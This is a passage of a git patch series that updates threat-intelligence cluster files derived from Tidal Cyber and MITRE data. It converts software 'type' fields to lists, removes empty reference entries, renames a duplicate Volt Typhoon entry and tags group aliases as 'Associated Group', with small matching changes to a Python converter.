-29598,7 +31224,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29641,7 +31269,9 @@ ], "software_attack_id": "S0678", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29682,7 +31312,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -29704,7 +31336,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29758,7 +31392,9 @@ "tags": [ "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29825,7 +31461,9 @@ ], "software_attack_id": "S0094", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29856,7 +31494,9 @@ ], "software_attack_id": "S0001", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29915,7 +31555,9 @@ "992bdd33-4a47-495d-883a-58010a2f0efb", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29946,7 +31588,9 @@ ], "software_attack_id": "S0178", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -29969,7 +31613,9 @@ ], "software_attack_id": "S0436", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30001,7 +31647,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [], "uuid": "57f9458f-4dad-411e-9971-8e3e166f173b", @@ -30037,7 +31685,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30078,7 +31728,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30098,7 +31750,9 @@ ], "software_attack_id": "S0647", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30121,7 +31775,9 @@ ], "software_attack_id": "S0199", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30147,7 +31803,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30171,7 +31829,9 @@ "7de7d799-f836-4555-97a4-0db776eb6932", "ed2b3f47-3e07-4019-a9bf-ec9d87f28c96" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30190,7 +31850,9 @@ ], "software_attack_id": "S0333", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30209,7 +31871,9 @@ ], "software_attack_id": "S0221", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30228,7 +31892,9 @@ ], "software_attack_id": "S0130", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30273,7 +31939,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30313,7 +31981,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30346,7 +32016,9 @@ ], "software_attack_id": "S0275", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30395,7 +32067,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30433,7 +32107,9 @@ "tags": [ "1efd43ee-5752-49f2-99fe-e3441f126b00" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30507,7 +32183,9 @@ "4d767e87-4cf6-438a-927a-43d2d0beaab7", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30550,7 +32228,9 @@ ], "software_attack_id": "S0452", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30604,7 +32284,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30656,7 +32338,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30678,7 +32362,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30704,7 +32390,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30727,7 +32415,9 @@ ], "software_attack_id": "S0207", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30772,7 +32462,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30791,7 +32483,9 @@ ], "software_attack_id": "S0442", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30836,7 +32530,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30855,7 +32551,9 @@ ], "software_attack_id": "S0257", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30881,7 +32579,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30922,7 +32622,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -30941,7 +32643,9 @@ ], "software_attack_id": "S0180", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -30985,7 +32689,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31025,7 +32731,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31066,7 +32774,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31107,7 +32817,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31148,7 +32860,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31188,7 +32902,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31229,7 +32945,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31313,7 +33031,9 @@ "7e7b0c67-bb85-4996-a289-da0e792d7172", "e809d252-12cc-494d-94f5-954c49eb87ce" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31383,7 +33103,9 @@ "tags": [ "15787198-6c8b-4f79-bf50-258d55072fee" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31426,7 +33148,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31449,7 +33173,9 @@ ], "software_attack_id": "S0579", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31475,7 +33201,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31501,7 +33229,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31528,7 +33258,9 @@ "8bf128ad-288b-41bc-904f-093f4fdde745", "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31561,7 +33293,9 @@ "cd1b5d44-226e-4405-8985-800492cf2865", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31618,7 +33352,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31640,7 +33376,9 @@ "tags": [ "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31663,7 +33401,9 @@ ], "software_attack_id": "S0206", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31703,7 +33443,9 @@ "tags": [ "1d306cbd-9894-4322-a233-b1576b8e25ba" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31751,7 +33493,9 @@ "meta": { "software_attack_id": "S0155", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31774,7 +33518,9 @@ ], "software_attack_id": "S0466", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31794,7 +33540,9 @@ "meta": { "software_attack_id": "S0219", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31814,7 +33562,9 @@ "meta": { "software_attack_id": "S0191", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31845,7 +33595,9 @@ ], "software_attack_id": "S0176", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31890,7 +33642,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -31909,7 +33663,9 @@ ], "software_attack_id": "S0059", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31932,7 +33688,9 @@ ], "software_attack_id": "S0430", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31959,7 +33717,9 @@ ], "software_attack_id": "S0141", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -31986,7 +33746,9 @@ "tags": [ "23d0545e-45fa-4f0a-957e-deb923039c80" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32027,7 +33789,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32057,7 +33821,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32102,7 +33868,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32125,7 +33893,9 @@ "tags": [ "2e621fc5-dea4-4cb9-987e-305845986cd3" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32153,7 +33923,9 @@ "509a90c7-9ca9-4b23-bca2-cd38ef6a6207", "cd1b5d44-226e-4405-8985-800492cf2865" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [], "uuid": "804da3b9-9c3a-4937-aa4a-efddfa5c176e", @@ -32189,7 +33961,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32236,7 +34010,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32275,7 +34051,9 @@ ], "software_attack_id": "S1065", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32316,7 +34094,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32357,7 +34137,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32406,7 +34188,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32447,7 +34231,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32487,7 +34273,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32528,7 +34316,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32565,7 +34355,9 @@ ], "software_attack_id": "S0161", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32593,7 +34385,9 @@ ], "software_attack_id": "S0341", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32612,7 +34406,9 @@ ], "software_attack_id": "S0653", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32632,7 +34428,9 @@ "meta": { "software_attack_id": "S0123", "source": "MITRE", - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32664,7 +34462,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32706,7 +34506,9 @@ "5e7433ad-a894-4489-93bc-41e90da90019", "7e7b0c67-bb85-4996-a289-da0e792d7172" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32738,7 +34540,9 @@ "efa33611-88a5-40ba-9bc4-3d85c6c8819b", "8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32782,7 +34586,9 @@ "15787198-6c8b-4f79-bf50-258d55072fee", "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32843,7 +34649,9 @@ ], "software_attack_id": "S0117", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32900,7 +34708,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -32922,7 +34732,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32948,7 +34760,9 @@ "tags": [ "16b47583-1c54-431f-9f09-759df7b5ddb7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -32984,7 +34798,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33008,7 +34824,9 @@ "meta": { "software_attack_id": "S0027", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33030,7 +34848,9 @@ "tags": [ "84615fe0-c2a5-4e07-8957-78ebc29b4635" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33056,7 +34876,9 @@ "tags": [ "4d767e87-4cf6-438a-927a-43d2d0beaab7" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33097,7 +34919,9 @@ "303a3675-4855-4323-b042-95bb1d907cca", "509a90c7-9ca9-4b23-bca2-cd38ef6a6207" ], - "type": "tool" + "type": [ + "tool" + ] }, "related": [ { @@ -33116,7 +34940,9 @@ ], "software_attack_id": "S0086", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33177,7 +35003,9 @@ ], "software_attack_id": "S0672", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33215,7 +35043,9 @@ "tags": [ "f8669b82-2194-49a9-8e20-92e7f9ab0a6f" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33251,7 +35081,9 @@ "tags": [ "febea5b6-2ea2-402b-8bec-f3f5b3f73c59" ], - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { @@ -33290,7 +35122,9 @@ ], "software_attack_id": "S1013", "source": "MITRE", - "type": "malware" + "type": [ + "malware" + ] }, "related": [ { diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 9d7594f..7dbb308 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -30,7 +30,7 @@ class AssociatedGroupsMeta(Meta): @dataclass class SoftwareMeta(Meta): source: str = None - type: str = None + type: list = None software_attack_id: str = None platforms: list = None tags: list = None @@ -279,7 +279,7 @@ class SoftwareCluster(Cluster): for entry in data["data"]: meta = SoftwareMeta( source=entry.get("source"), - type=entry.get("type"), + type=[entry.get("type")], software_attack_id=entry.get("software_attack_id"), platforms=[x.get("name") for x in entry.get("platforms")], tags=[x.get("tag") for x in entry.get("tags")], From 9e78c8512427286a4846842e64ebddaf70cc2013 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 15:55:07 +0100 Subject: [PATCH 41/49] Fix [references] no empty refs --- clusters/tidal-references.json | 12 ------------ tools/tidal-api/models/cluster.py | 2 +- 2 files changed, 1 insertion(+), 13 deletions(-) diff --git a/clusters/tidal-references.json b/clusters/tidal-references.json index 39b4552..c6ec02f 100644 --- a/clusters/tidal-references.json +++ b/clusters/tidal-references.json @@ -8261,9 +8261,6 @@ "meta": { "date_accessed": "2016-09-13T00:00:00Z", "date_published": "2016-09-13T00:00:00Z", - "refs": [ - "" - ], "source": "MITRE", "title": "Bypassing Application Whitelisting using MSBuild.exe - Device Guard Example and Mitigations" }, @@ -22573,9 +22570,6 @@ "meta": { "date_accessed": "2018-07-27T00:00:00Z", "date_published": "2016-10-20T00:00:00Z", - "refs": [ - "" - ], "source": "MITRE", "title": "How to: Find the Web Application Root" }, @@ -43869,9 +43863,6 @@ "description": "SanDisk. (n.d.). Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.). Retrieved October 2, 2018.", "meta": { "date_accessed": "2018-10-02T00:00:00Z", - "refs": [ - "" - ], "source": "MITRE", "title": "Self-Monitoring, Analysis and Reporting Technology (S.M.A.R.T.)" }, @@ -48546,9 +48537,6 @@ "meta": { "date_accessed": "2017-12-20T00:00:00Z", "date_published": "2014-07-01T00:00:00Z", - "refs": [ - "" - ], "source": "MITRE", "title": "The Art of Memory Forensics: Detecting Malware and Threats in Windows, Linux, and Mac Memory" }, diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index 7dbb308..bcb328b 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -487,7 +487,7 @@ class ReferencesCluster(Cluster): for entry in data["data"]: meta = ReferencesMeta( source=entry.get("source"), - refs=[entry.get("url")], + refs=[entry.get("url")] if entry.get("url") != "" else None, title=entry.get("title"), author=entry.get("author"), date_accessed=entry.get("date_accessed"), From a88b3ced3334ea3c37f9fa69a131db776bd237f9 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 16:15:58 +0100 Subject: [PATCH 42/49] Chg [groups] change name for Volt Typhoon duplicate --- clusters/tidal-groups.json | 2 +- tools/tidal-api/models/cluster.py | 5 +++++ 2 files changed, 6 insertions(+), 1 deletion(-) diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index 2543872..c07c474 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -9947,7 +9947,7 @@ }, "related": [], "uuid": "3290dcb9-5781-4b87-8fa0-6ae820e152cd", - "value": "Volt Typhoon" + "value": "Volt Typhoon - Tidal" }, { "description": "[[Secureworks BRONZE SILHOUETTE May 2023](https://app.tidalcyber.com/references/77624549-e170-5894-9219-a15b4aa31726)]", diff --git a/tools/tidal-api/models/cluster.py b/tools/tidal-api/models/cluster.py index bcb328b..f0487ee 100644 --- a/tools/tidal-api/models/cluster.py +++ b/tools/tidal-api/models/cluster.py @@ -254,6 +254,11 @@ class GroupCluster(Cluster): uuid=entry.get("id"), value=entry.get("name"), ) + + # Code Block for handling duplicate from Tidal API data (hopefully only temporary) + if value.uuid == "3290dcb9-5781-4b87-8fa0-6ae820e152cd": + value.value = "Volt Typhoon - Tidal" + self.values.append(value.return_value()) From 16366f68938d96e690ad4516eb6dd56c5854b980 Mon Sep 17 00:00:00 2001 From: niclas Date: Tue, 5 Mar 2024 16:24:29 +0100 Subject: [PATCH 43/49] Chg [tidal] add associated to name --- clusters/tidal-groups.json | 560 +++++++++--------- clusters/tidal-software.json | 940 +++++++++++++++--------------- tools/tidal-api/models/cluster.py | 4 +- 3 files changed, 752 insertions(+), 752 deletions(-) diff --git a/clusters/tidal-groups.json b/clusters/tidal-groups.json index c07c474..346f911 100644 --- a/clusters/tidal-groups.json +++ b/clusters/tidal-groups.json @@ -44,7 +44,7 @@ } ], "uuid": "9585b539-c040-40a6-a94c-fcf8afa786e2", - "value": "Operation Woolen-Goldfish" + "value": "Operation Woolen-Goldfish - Associated Group" }, { "description": "[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", @@ -58,7 +58,7 @@ } ], "uuid": "81051e64-7fde-44c5-816e-a85b25a02e11", - "value": "AjaxTM" + "value": "AjaxTM - Associated Group" }, { "description": "[[CrowdStrike Flying Kitten ](https://app.tidalcyber.com/references/ab669ded-e659-4313-b5ab-8c5362562f39)]", @@ -72,7 +72,7 @@ } ], "uuid": "aea21266-a894-40a3-a8cd-2eb2136859d8", - "value": "Flying Kitten" + "value": "Flying Kitten - Associated Group" }, { "description": "[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", @@ -86,7 +86,7 @@ } ], "uuid": "c7e17231-5a22-49f8-a174-b15d5143b169", - "value": "Operation Saffron Rose" + "value": "Operation Saffron Rose - Associated Group" }, { "description": "Analysis of infrastructure, tools, and modes of operation revealed a potential relationship between [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) and Rocket Kitten.[[Check Point Rocket Kitten](https://app.tidalcyber.com/references/71da7d4c-f1f8-4f5c-a609-78a414851baf)][[IranThreats Kittens Dec 2017](https://app.tidalcyber.com/references/8338ad75-89f2-47d8-b85b-7cbf331bd7cd)]", @@ -100,7 +100,7 @@ } ], "uuid": "ed2a8933-1662-460c-b400-db7a03921659", - "value": "Rocket Kitten" + "value": "Rocket Kitten - Associated Group" }, { "description": "[Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://app.tidalcyber.com/groups/e38bcb42-12c1-4202-a794-ec26cd830caa) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.[[FireEye Operation Saffron Rose 2013](https://app.tidalcyber.com/references/2f4c0941-d14e-4eb8-828c-f1d9a1e14a95)]", @@ -145,7 +145,7 @@ } ], "uuid": "045b431e-ca2a-4b1b-a6fa-758127ce2b4e", - "value": "Silent Chollima" + "value": "Silent Chollima - Associated Group" }, { "description": "[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is a North Korean state-sponsored threat group that has been active since at least 2009. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) has primarily focused its operations--which have included destructive attacks--against South Korean government agencies, military organizations, and a variety of domestic companies; they have also conducted cyber financial operations against ATMs, banks, and cryptocurrency exchanges. [Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46)'s notable activity includes Operation Black Mine, Operation GoldenAxe, and Campaign Rifle.[[FSI Andariel Campaign Rifle July 2017](https://app.tidalcyber.com/references/bde61ee9-16f9-4bd9-a847-5cc9df21335c)][[IssueMakersLab Andariel GoldenAxe May 2017](https://app.tidalcyber.com/references/10a21964-d31f-40af-bf32-5ccd7d8c99a2)][[AhnLab Andariel Subgroup of Lazarus June 2018](https://app.tidalcyber.com/references/bbc66e9f-98f9-4e34-b568-2833ea536f2e)][[TrendMicro New Andariel Tactics July 2018](https://app.tidalcyber.com/references/b667eb44-8c2f-4319-bc93-f03610214b8b)][[CrowdStrike Silent Chollima Adversary September 2021](https://app.tidalcyber.com/references/835283b5-af3b-4baf-805e-da8ebbe8b5d2)]\n\n[Andariel](https://app.tidalcyber.com/groups/2cc997b5-5076-4eef-9974-f54387614f46) is considered a sub-set of [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08), and has been attributed to North Korea's Reconnaissance General Bureau.[[Treasury North Korean Cyber Groups September 2019](https://app.tidalcyber.com/references/54977bb2-2929-41d7-bdea-06d39dc76174)]\n\nNorth Korean group definitions are known to have significant overlap, and some security researchers report all North Korean state-sponsored cyber activity under the name [Lazarus Group](https://app.tidalcyber.com/groups/0bc66e95-de93-4de7-b415-4041b7191f08) instead of tracking clusters or subgroups.", @@ -232,7 +232,7 @@ } ], "uuid": "8a3ffc59-378f-447a-bd67-129659941a20", - "value": "Storm-1359" + "value": "Storm-1359 - Associated Group" }, { "description": "Anonymous Sudan is an apparent hacktivist collective that has primarily used distributed denial of service (DDoS) and website defacement attacks in support of its ideology, which appears to largely align with Russian state interests. The group regularly cross-promotes communications with Killnet, another hacktivist group that appears to share similar ideologies and methods of operation.[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)] Researchers assess that the group is affiliated with neither the Anonymous hacktivist group nor Sudan.[[CyberCX Anonymous Sudan June 19 2023](/references/68ded9b7-3042-44e0-8bf7-cdba2174a3d8)]\n\nSince emerging in January 2023, Anonymous Sudan has claimed and is believed to be responsible for a considerable number of DDoS attacks affecting victims in a wide range of geographic locations and sectors.[[Flashpoint Anonymous Sudan Timeline](/references/2e7060d2-f7bc-457e-a2e6-12897d503ea6)] It claimed responsibility for a series of early June 2023 DDoS attacks that caused temporary interruptions to Microsoft Azure, Outlook, and OneDrive services. Microsoft security researchers attributed those attacks to the Storm-1359 group.[[The Hacker News Microsoft DDoS June 19 2023](/references/2ee27b55-b7a7-40a8-8c0b-5e28943cd273)][[Microsoft DDoS Attacks Response June 2023](/references/d64e941e-785b-4b23-a7d0-04f12024b033)] Like Killnet, Anonymous Sudan claimed responsibility for disruptive attacks against computer networks in Israel following a series of air- and land-based attacks in the Gaza Strip in October 2023.[[FalconFeedsio Tweet October 9 2023](/references/e9810a28-f060-468b-b4ea-ffed9403ae8b)]", @@ -297,7 +297,7 @@ } ], "uuid": "b618f5c9-c399-4b6e-a614-12a383ba363c", - "value": "Comment Group" + "value": "Comment Group - Associated Group" }, { "description": "[[CrowdStrike Putter Panda](https://app.tidalcyber.com/references/413962d0-bd66-4000-a077-38c2677995d1)]", @@ -311,7 +311,7 @@ } ], "uuid": "22829c72-7358-468d-b661-da019a020d6e", - "value": "Comment Panda" + "value": "Comment Panda - Associated Group" }, { "description": "[[Mandiant APT1](https://app.tidalcyber.com/references/865eba93-cf6a-4e41-bc09-de9b0b3c2669)]", @@ -325,7 +325,7 @@ } ], "uuid": "88a50fe2-ab89-4dc3-8c47-0b0661f5c8e2", - "value": "Comment Crew" + "value": "Comment Crew - Associated Group" }, { "description": 